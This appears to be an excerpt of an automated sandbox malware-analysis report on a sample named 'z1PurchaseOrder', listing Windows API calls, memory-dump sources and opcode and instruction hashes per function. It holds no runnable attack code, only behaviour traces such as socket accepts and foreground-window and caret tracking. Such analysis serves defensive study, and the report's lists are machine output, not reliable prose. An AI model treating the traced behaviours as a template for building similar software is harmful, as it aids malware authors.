                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Proc$Parent
                                        • String ID:
                                        • API String ID: 2351499541-0
                                        • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                        • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                        • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                        • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                        APIs
                                          • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                        • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                        • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                        • __itow.LIBCMT ref: 00461461
                                        • __itow.LIBCMT ref: 004614AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$__itow$_wcslen
                                        • String ID:
                                        • API String ID: 2875217250-0
                                        • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                        • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                        • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                        • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                        APIs
                                        • _memset.LIBCMT ref: 0040E202
                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell__memset
                                        • String ID:
                                        • API String ID: 928536360-0
                                        • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                        • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                        • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                        • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 00472806
                                          • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                          • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                          • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                        • GetCaretPos.USER32(?), ref: 0047281A
                                        • ClientToScreen.USER32(00000000,?), ref: 00472856
                                        • GetForegroundWindow.USER32 ref: 0047285C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                        • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                        • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                        • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                        APIs
                                          • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                        • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$Long$AttributesLayered
                                        • String ID:
                                        • API String ID: 2169480361-0
                                        • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                        • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                        • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                        • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                        APIs
                                        • SendMessageW.USER32 ref: 00448CB8
                                        • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow
                                        • String ID:
                                        • API String ID: 312131281-0
                                        • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                        • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                        • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                        • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                        APIs
                                        • select.WSOCK32 ref: 0045890A
                                        • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                        • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                                        • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ErrorLastacceptselect
                                        • String ID:
                                        • API String ID: 385091864-0
                                        • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                        • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                        • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                        • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                        • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                        • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                        • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                        • GetStockObject.GDI32(00000011), ref: 00433695
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                        • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$CreateMessageObjectSendShowStock
                                        • String ID:
                                        • API String ID: 1358664141-0
                                        • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                        • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                        • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                        • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                        • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                        • CloseHandle.KERNEL32(00000000), ref: 00444213
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 2880819207-0
                                        • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                        • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                        • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                        • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00434037
                                        • ScreenToClient.USER32(?,?), ref: 0043405B
                                        • ScreenToClient.USER32(?,?), ref: 00434085
                                        • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ClientRectScreen$InvalidateWindow
                                        • String ID:
                                        • API String ID: 357397906-0
                                        • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                        • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                        • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                        • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                        APIs
                                        • __wsplitpath.LIBCMT ref: 00436A45
                                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                        • __wsplitpath.LIBCMT ref: 00436A6C
                                        • __wcsicoll.LIBCMT ref: 00436A93
                                        • __wcsicoll.LIBCMT ref: 00436AB0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                        • String ID:
                                        • API String ID: 1187119602-0
                                        • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                        • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                        • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                        • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                                        • String ID:
                                        • API String ID: 1597257046-0
                                        • Opcode ID: ef4c8eb1668fb764ac9879486c39433899b48e1b70f0ed706df85b8b39ec7f0c
                                        • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                        • Opcode Fuzzy Hash: ef4c8eb1668fb764ac9879486c39433899b48e1b70f0ed706df85b8b39ec7f0c
                                        • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                        APIs
                                        • DeleteObject.GDI32(?), ref: 0045564E
                                        • DeleteObject.GDI32(?), ref: 0045565C
                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: DeleteDestroyObject$IconWindow
                                        • String ID:
                                        • API String ID: 3349847261-0
                                        • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                        • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                        • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                        • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                        APIs
                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                        • String ID:
                                        • API String ID: 2223660684-0
                                        • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                        • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                        • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                        • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                        APIs
                                          • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                          • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                          • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                        • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                        • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                        • EndPath.GDI32(?), ref: 004472B0
                                        • StrokePath.GDI32(?), ref: 004472BE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                        • String ID:
                                        • API String ID: 2783949968-0
                                        • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                        • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                        • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                        • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                        APIs
                                        • __getptd.LIBCMT ref: 00417D1A
                                          • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                          • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                        • __getptd.LIBCMT ref: 00417D31
                                        • __amsg_exit.LIBCMT ref: 00417D3F
                                        • __lock.LIBCMT ref: 00417D4F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                        • String ID:
                                        • API String ID: 3521780317-0
                                        • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                        • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                        • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                        • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 00471144
                                        • GetDC.USER32(00000000), ref: 0047114D
                                        • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                        • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                        • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
